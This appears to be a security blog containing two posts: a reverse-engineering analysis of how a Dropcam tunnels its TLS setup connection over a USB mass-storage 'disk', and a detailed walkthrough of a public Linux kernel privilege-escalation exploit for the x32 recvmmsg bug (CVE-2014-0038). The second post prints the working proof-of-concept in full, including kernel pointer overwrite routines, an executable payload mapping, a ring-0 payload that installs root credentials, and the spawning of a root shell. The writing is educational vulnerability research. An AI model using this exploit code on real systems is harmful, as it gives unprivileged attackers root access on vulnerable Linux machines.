The executable ran in a Windows virtual machine with Process Monitor from the Sysinternals Suite inspecting its behavior, while I captured USB traffic and network traffic from the setup executable using two instances of Wireshark on my Linux host machine. The setup executable also started the Chrome browser in the Windows VM, which I configured to use Burp Suite as a proxy.

Process Monitor gave me an initial idea of what was going on:


The setup binary is first reading the .dcdata/offset file (1), then doing reads and writes directly to the "disk" (2). The .dcdata/offset file is simply a text file with a number in it:
$ cat .dcdata/offset
1312768

You can see that 1312768 is the byte-offset into the "disk" where the setup executable is reading and writing (3). Wireshark lets us see the actual data that is being transferred back and forth. Here's a screenshot of part of the USB capture:


You can see that a SCSI Write command is being made to logical block address 0xa04, with length 4 (1). 0xa04 is 2564, which multiplied by the 512-byte block size is byte 1312768. The length 4 multiplied by 512 is 2048 bytes; this write corresponds to the highlighted WriteFile command in the Process Monitor screenshot. The data being written is shown in the hexdump (2) of the URB_BULK packet (3) following the SCSI Write command packet.
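The arithmetic tying the offset file to the SCSI command is easy to check. A small Python sketch, assuming the 512-byte block size mentioned above:

```python
BLOCK_SIZE = 512  # bytes per logical block, as stated above


def byte_offset_to_lba(offset, block_size=BLOCK_SIZE):
    """Convert a byte offset into a logical block address."""
    lba, remainder = divmod(offset, block_size)
    if remainder:
        raise ValueError("offset is not aligned to a block boundary")
    return lba


offset = 1312768                # contents of .dcdata/offset
lba = byte_offset_to_lba(offset)
print(lba, hex(lba))            # 2564 0xa04
print(4 * BLOCK_SIZE)           # 2048 bytes for a 4-block write
```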

What's happening is that the setup binary is communicating with the Dropcam by reading and writing network packets from and to a "magic" address on the USB mass storage "disk". By looking at multiple packets being sent over this USB channel and reading the setup binary in IDA, I was able to get an idea of the protocol.


Above is a screenshot from the IDA Pro disassembly of the Macintosh setup binary (the Mac binary had more symbols and was easier to read than the Windows binary). The screenshot shows a portion of the code involved in decoding received packets. All the packets that I captured started with the magic big-endian number 0xd409ca11, and I found this code by searching in IDA for that number. You can see that the number (1) is confirmed to be a magic number by an error message that is reached when the first 4 bytes are non-zero and don't equal 0xd409ca11 (2). In addition, bytes 6 and 7 (3) appear to be a big-endian sequence number according to another error message (4), and bytes 8 and 9 (5) turn out to be a big-endian length field. The remaining two bytes (4 and 5) appear to increment from -1 in packets with no payload sent from the setup binary to the Dropcam; these are presumably acknowledgment packets.

Here are some packets, extracted from my USB Wireshark capture:

Init packet, setup -> dropcam:
d4 09 ca 11 ff ff 00 00 00 05 00 ff ff 00 00      ..............

Init response packet, dropcam -> setup:
d4 09 ca 11 00 00 00 00 01 25 00 ff ff 01 08 64   .........%.....d
30 32 34 33 37 38 31 38 32 64 61 34 66 33 37 62   024378182da4f37b
30 65 39 38 31 39 34 36 39 38 39 66 34 30 61 00   0e981946989f40a.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 8c 00 00 00 0f 02 00 01 00 13 01 bb 6e 65   ..............ne
78 75 73 2e 64 72 6f 70 63 61 6d 2e 63 6f 6d      xus.dropcam.com

Ack, setup -> dropcam
d4 09 ca 11 ff ff 00 01 00 00                     ..........

Data, dropcam -> setup
d4 09 ca 11 00 00 00 01 00 81 03 00 01 00 7c 16   ..............|.
03 01 00 77 01 00 00 73 03 01 4d e5 e3 9d c8 16   ...w...s..M.....
17 eb d7 4e 78 42 02 2e ef 7d 4b 14 d9 2b ad fe   ...NxB...}K..+..
f2 e4 84 68 49 1f 0f fc 00 ab 00 00 06 c0 13 c0   ...hI...........
14 00 ff 01 00 00 44 00 0b 00 04 03 00 01 02 00   ......D.........
0a 00 34 00 32 00 01 00 02 00 03 00 04 00 05 00   ..4.2...........
06 00 07 00 08 00 09 00 0a 00 0b 00 0c 00 0d 00   ................
0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00   ................
16 00 17 00 18 00 19 00 23 00 00                  ........#..    

Ack, setup -> dropcam
d4 09 ca 11 00 00 00 02 00 00                     ..........

Data, setup -> dropcam
d4 09 ca 11 00 01 00 03 06 1b 03 00 01 06 16 16   ................
03 01 06 11 02 00 00 4d 03 01 52 61 ba a6 7f 84   .......M..Ra....
26 84 98 0d ed 96 f2 07 e2 90 30 9c 6d 21 9d 4f   &.........0.m!.O
fa 80 8f 91 3f 75 ba bd 01 d6 20 52 61 ba a6 7b   ....?u.... Ra..{
f6 97 94 dc 02 28 3c 49 2c 2b c4 18 f8 8d df f3   .....(<I,+......
ac e9 de d3 06 fe bc ed 25 dd 7f c0 13 00 00 05   ........%.......
ff 01 00 01 00 0b 00 03 0b 00 03 08 00 03 05 30   ...............0
82 03 01 30 82 01 e9 02 05 00 ed f7 59 0d 30 0d   ...0........Y.0.
06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 47 31   ..*.H........0G1
0b 30 09 06 03 55 04 06 13 02 55 53 31 26 30 24   .0...U....US1&0$
06 03 55 04 03 13 1d 44 72 6f 70 63 61 6d 20 43   ..U....Dropcam C
65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f   ertificate Autho
72 69 74 79 31 10 30 0e 06 03 55 04 0a 13 07 44   rity1.0...U....D
72 6f 70 63 61 6d 30 22 18 0f 32 30 30 31 30 31   ropcam0"..200101
30 31 30 30 30 30 30 30 5a 18 0f 32 30 35 30 30   01000000Z..20500
31 30 31 30 30 30 30 30 30 5a 30 3e 31 0b 30 09   101000000Z0>1.0.
06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55   ..U....US1.0...U
04 03 13 14 6f 63 75 6c 75 73 37 34 2e 64 72 6f   ....oculus74.dro
70 63 61 6d 2e 63 6f 6d 31 10 30 0e 06 03 55 04   pcam.com1.0...U.
0a 13 07 44 72 6f 70 63 61 6d 30 82 01 22 30 0d   ...Dropcam0.."0.
(etc.)

The setup binary starts out by sending an initialization command to the Dropcam (command 00 ff ff 00 00). The Dropcam replies with a packet containing its UUID (so the setup binary knows where to point the web browser), and a host for the setup binary to initiate a TCP connection to (nexus.dropcam.com). After that, every packet contains a 5-byte sub-header (the first byte is 0x03, the last two bytes are a length field), followed by data. The same data showed up in my other Wireshark instance, which was capturing the TLSv1 connection that the setup binary made to nexus.dropcam.com. In other words, the Dropcam requests that a TCP connection be made, and the setup binary tunnels all of that connection's traffic over the USB mass storage channel.
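
As a rough illustration of the sub-header just described, the sketch below pulls the length field out of the five bytes. It assumes the length is big-endian, which is how the captures above read (`03 00 01 00 7c` is followed by 0x7c bytes of TLS data), and it treats the two middle bytes as opaque because their meaning isn't established here. The struct and function names are made up for this example; this is not code from the setup binary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the 5-byte tunnel sub-header. */
struct tunnel_subhdr {
    uint8_t  type;        /* 0x03 in the data packets shown above */
    uint8_t  unknown[2];  /* meaning not established; kept opaque */
    uint16_t length;      /* payload length, assumed big-endian */
};

/*
 * Parse a sub-header from buf. Returns 0 on success, -1 if the buffer is
 * too short, the first byte is not 0x03, or the advertised payload does
 * not fit in the bytes that follow.
 */
int parse_subhdr(const uint8_t *buf, size_t len, struct tunnel_subhdr *out)
{
    assert(buf != NULL && out != NULL);
    if (len < 5 || buf[0] != 0x03)
        return -1;
    out->type = buf[0];
    out->unknown[0] = buf[1];
    out->unknown[1] = buf[2];
    out->length = (uint16_t)((buf[3] << 8) | buf[4]);
    if ((size_t)out->length > len - 5)
        return -1;
    return 0;
}
```

Feeding it the bytes that follow the outer header in the first "dropcam -> setup" data packet gives a length of 0x7c, which is exactly the 5-byte TLS record header plus the 0x77-byte handshake message that follows.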

So this is how the Dropcam connects to the internet: it appears as a USB mass storage device containing a setup executable to the host computer; the setup binary then tunnels a connection from the Dropcam over the USB link by reading and writing at a particular offset into the raw "disk" and connecting out to the internet using the host computer's internet connection. Meanwhile, the user is presented with a list of WiFi networks that the cloud server obtained over the tunneled connection. The user picks their network in the web interface, and types in their WiFi password. The selected network and password are then sent in a POST request to the cloud server, which pushes the password down to the camera, again over the tunneled connection.

Considerations for WiFi password privacy

Something that users should be aware of is that this approach requires them to upload their network password to the dropcam.com server, and it might not be clear to a non-technical user that they are doing this. Dropcam (the company) probably isn't doing anything directly with the transmitted WiFi passwords, but there's no guarantee that an attacker who compromised the Dropcam cloud servers wouldn't. It's always good practice to avoid sending confidential data to the cloud; the setup binary could instead communicate the WiFi information directly to the camera. There may be some other product architecture reason for the current design that we're not aware of.

Further exploring the encrypted connections

The Dropcam makes two outgoing TLS connections over the USB tunnel. The first is to nexus.dropcam.com; that connection directs the camera to connect to an “oculus” server; my Dropcam connected to oculus101.dropcam.com. The camera itself makes the same two TLS connections over WiFi once it is configured; a short connection to nexus.dropcam.com followed by a long-term connection to an “oculus” server. The long-term connection is used for all of the camera's communications including streaming video, configuration changes, and firmware updates.

After understanding how the Dropcam tunnels its TLS connections out over the mass storage interface, the next step was to attempt a man-in-the-middle attack on the TLS connections in order to capture their contents. However, the TLS connections utilize both client and server side certificate verification - when making the outgoing TLS connections, the Dropcam checks the server's certificate, and the server also checks the Dropcam's client certificate. Since the TLS connection endpoint is on the camera itself (not in the setup binary), I wasn't able to inspect the contents of the TLS connection until after I'd taken the Dropcam apart, which I'll describe in our next Dropcam blog post.

Follow us on twitter @IncludeSecurity and check this blog again next week for subsequent posts in this Reverse Engineering series.

Thursday, March 6, 2014

How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038

On January 31st 2014 a post appeared on the oss-sec mailing list [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long until the first exploits appeared. In this blog post we'll walk through the vulnerability and Samuel's proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear, the x32 ABI (not to be confused with the x86 ABI) is a separate ABI that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux have enabled it. For more details on the x32 ABI refer to [2]. In short, x32 is an ABI which takes advantage of the 64-bit environment while using 32-bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64-bit applications by adding the value of __X32_SYSCALL_BIT to 64-bit system call numbers.
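
A small sketch of that arithmetic, under stated assumptions: `__X32_SYSCALL_BIT` is 0x40000000, and the table slot used for recvmmsg here (537) is our understanding of where the x32-specific entry lives. Calls that need a compat handler appear to get their own x32 slots from 512 upward rather than reusing the plain 64-bit number, so check the syscall table of the kernel you are looking at. The macro and function names below are local to this example.

```c
#include <assert.h>

/* Value of __X32_SYSCALL_BIT in the kernel's x86 headers. */
#define X32_SYSCALL_BIT 0x40000000L

/*
 * Assumed slot of recvmmsg in the x32-specific part of the syscall table.
 * Verify against the syscall table of the target kernel.
 */
#define X32_RECVMMSG_SLOT 537L

/* Turn a table slot into the number a 64-bit process passes to syscall(2). */
long x32_syscall_nr(long slot)
{
    assert(slot >= 0 && slot < X32_SYSCALL_BIT);
    return X32_SYSCALL_BIT + slot;
}
```

With these assumptions, `x32_syscall_nr(X32_RECVMMSG_SLOT)` evaluates to 0x40000219, which is the kind of value an ordinary 64-bit binary would hand to `syscall()` to reach the x32 entry point.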

The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
    int datagrams;
    struct timespec ktspec;

    if (flags & MSG_CMSG_COMPAT)
        return -EINVAL;

    if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
        return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                              flags | MSG_CMSG_COMPAT,
                              (struct timespec *) timeout);
    /* ... */

Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
                unsigned int, vlen, unsigned int, flags,
                struct timespec __user *, timeout)
{
    int datagrams;
    struct timespec timeout_sys;

    if (flags & MSG_CMSG_COMPAT)
        return -EINVAL;

    if (!timeout)
        return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);

    /* -1- */
    if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
        return -EFAULT;

    datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);

    if (datagrams > 0 &&
        copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
        datagrams = -EFAULT;

    return datagrams;
}

At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec {
    long tv_sec;   /* seconds */
    long tv_nsec;  /* nanoseconds */
};

Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                   unsigned int flags, struct timespec *timeout)
{
    if (timeout &&                                        /* -1- */
        poll_select_set_timeout(&end_time, timeout->tv_sec,
                                timeout->tv_nsec))
        return -EINVAL;
    /* ... */
    while (datagrams < vlen) {                            /* -2- */
        /*
         * Basically just a loop calling recvmsg
         * until the timeout is hit or vlen messages have
         * been received.
         */
        if (MSG_CMSG_COMPAT & flags) {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            /* ... */
        } else {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            /* ... */
        }
        /* ... */
        if (timeout) {
            ktime_get_ts(timeout);  // put current time into *timeout
                                    // then subtract that from end_time
            *timeout = timespec_sub(end_time, *timeout);  /* -3- */
            if (timeout->tv_sec < 0) {
                timeout->tv_sec = timeout->tv_nsec = 0;   /* -4- */
                break;
            }
            /* Timeout, return less than vlen datagrams */
            if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
                break;
        }
        /* ... */

The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts)
{
    /* Dates before 1970 are bogus */
    if (ts->tv_sec < 0)                               /* -5- */
        return false;
    /* Can't have more nanoseconds then a second */
    if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC)   /* -6- */
        // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
        return false;
    return true;
}

At -5- the first long, tv_sec, is checked to be non-negative, meaning its most significant byte must be smaller than 0x80, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be at least 0 and below 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by ___sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since pointers into the kernel image on x86_64 have their upper 4 bytes set to 0xff, they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241               uninitialized data
     (little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.
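
To make the diagram concrete, here is a minimal user-space sketch of how the kernel would interpret those bytes when the timeout pointer is aimed at the last byte of the pointer. `struct ts64`, `timespec_at` and `ts64_valid` are names invented for this example; the validity test simply repeats the two checks from timespec_valid() shown earlier, and the code assumes a little-endian host such as x86_64.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000L

/* Stand-in for the kernel's struct timespec on a 64-bit system. */
struct ts64 {
    int64_t tv_sec;
    int64_t tv_nsec;
};

/*
 * Read the 16 bytes at mem + off the way the kernel would see *timeout.
 * Assumes a little-endian host, as on x86_64.
 */
struct ts64 timespec_at(const uint8_t *mem, size_t off)
{
    struct ts64 ts;

    assert(mem != NULL);
    memcpy(&ts, mem + off, sizeof(ts));
    return ts;
}

/* The same two checks that timespec_valid() performs. */
int ts64_valid(struct ts64 ts)
{
    if (ts.tv_sec < 0)
        return 0;
    if ((uint64_t)ts.tv_nsec >= (uint64_t)NSEC_PER_SEC)
        return 0;
    return 1;
}
```

For the 24 bytes in the diagram, `timespec_at(mem, 7)` yields tv_sec = 255 and tv_nsec = 0, which passes the check. Pointing at offset 0 instead makes tv_sec the full kernel pointer, a negative number, so the syscall would bail out with -EINVAL.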

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:
  • Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload at the end of that region.
  • Target the release function pointer of the ptmx_fops structure located in the .data  section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
  • Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
  • Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved, those are

#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which will help with resolving the symbols. The README in the PoC provides details on how to use it.

Setting things up

/* Prepare payload... */
printf("preparing payload buffer...\n");
/* 7 = PROT_READ | PROT_WRITE | PROT_EXEC, 0x32 = MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS */
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);

The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.
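
The mask arithmetic can be checked with a few lines of C. This is only a worked example using the sample TTY_RELEASE value from the defines above; the helper names are made up here, and the addresses will differ on any other kernel build.

```c
#include <assert.h>
#include <stdint.h>

/* Sample value from the defines above; kernel-build specific. */
#define TTY_RELEASE 0xffffffff8142fec0ULL

/* Where the kernel will jump once the top three bytes are zeroed. */
uint64_t cleared_target(uint64_t kptr)
{
    /* only meaningful for pointers whose upper four bytes are 0xff */
    assert((kptr >> 32) == 0xffffffffULL);
    return kptr & 0x000000ffffffffffULL;
}

/* Page-aligned base handed to mmap(): same mask, low 12 bits dropped too. */
uint64_t map_base(uint64_t kptr)
{
    return kptr & 0x000000fffffff000ULL;
}
```

For the sample value this gives a mapping base of 0x000000ff8142f000 and a jump target of 0x000000ff8142fec0, so execution would begin 0xec0 bytes into the mapping. Presumably that lands in the nop fill and runs forward into the payload copied to the end of the region.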

The target

/*
 * Now clear the three most significant bytes of the fops pointer
 * to the release function.
 * This will make it point into the memory region mapped above.
 */
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
    pids[i] = fork();
    if (pids[i] == 0) {
        zero_out(target + (5 + i));
        exit(EXIT_SUCCESS);
    }
    sleep(1);
}

The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)

Exploiting the bug

void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;

    srand(time(NULL));
    port = 1024 + (rand() % (0x10000 - 1024));

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base = buf;
    iovecs.iov_len = BUFSIZE;
    msgs.msg_hdr.msg_iov = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;

    /*
     * start a separate process to send a UDP message after 255 seconds so the syscall returns,
     * but only after updating the timeout struct and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx\n", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);
        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }
        sa.sin_family = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port = htons(port);

        sleep(0xfe);
        printf("waking up parent...\n");
        sendto(sockfd, buf, BUFSIZE, 0, (struct sockaddr *) &sa, sizeof(sa));  /* -1- */
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);     /* -2- */
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec struct!\n");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out\n");
    } else {
        perror("fork()");
        exit(EXIT_FAILURE);
    }
}

This is the key part of the exploit: we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the timeout pointer and the vulnerable syscall is called (-2-).
At -1- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1
Turning it into:
     release pointer               mangled                  mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
ptmx_fops->release now points into the memory region that was mapped at the beginning.
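
The before and after pictures can be reproduced with a small user-space model. The sketch below is only an approximation of the kernel logic under stated assumptions: each child's timeout is read from memory when its syscall starts, and what is written back later is that value minus the elapsed time, or zeros if the timeout has already expired. `struct ts64`, `read_timeout` and `write_remaining` are names invented for this example, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000LL

struct ts64 {
    int64_t tv_sec;
    int64_t tv_nsec;
};

/* Timeout as the kernel reads it on syscall entry (little-endian host). */
struct ts64 read_timeout(const uint8_t *mem, size_t off)
{
    struct ts64 t;

    memcpy(&t, mem + off, sizeof(t));
    return t;
}

/*
 * Write back what is left of `initial` after elapsed_ns, mirroring the
 * timespec_sub() step and the "tv_sec < 0" reset in __sys_recvmmsg.
 */
void write_remaining(uint8_t *mem, size_t off, struct ts64 initial,
                     int64_t elapsed_ns)
{
    struct ts64 t = { 0, 0 };
    int64_t left;

    /* keep the nanosecond arithmetic below from overflowing */
    assert(initial.tv_sec >= 0 && initial.tv_sec < INT64_MAX / NSEC_PER_SEC);
    left = initial.tv_sec * NSEC_PER_SEC + initial.tv_nsec - elapsed_ns;
    if (left > 0) {
        t.tv_sec = left / NSEC_PER_SEC;
        t.tv_nsec = left % NSEC_PER_SEC;
    }
    memcpy(mem + off, &t, sizeof(t));
}
```

Starting from `c0 fe 42 81 ff ff ff ff` followed by zeros, the three children initially see tv_sec values of 0xffffff, 0xffff and 0xff at offsets 5, 6 and 7. After 254.5 seconds each has 0xffff00, 0xff00 and 0 whole seconds left, so every write zeroes the lowest byte of its own tv_sec. Applying the writes in order leaves the pointer at 0x000000ff8142fec0, with leftover nanoseconds spilling into the following longs.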

Code execution in Ring 0

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);

At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3))) kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

    /* restore function pointer and following two longs */
    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;

    /* escalate to root */
    commit_creds(prepare_kernel_cred(0));

    return -1;
}

This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].

Finishing

if (getuid() != 0) {
    printf("failed to get root :(\n");
    exit(EXIT_FAILURE);
}

printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
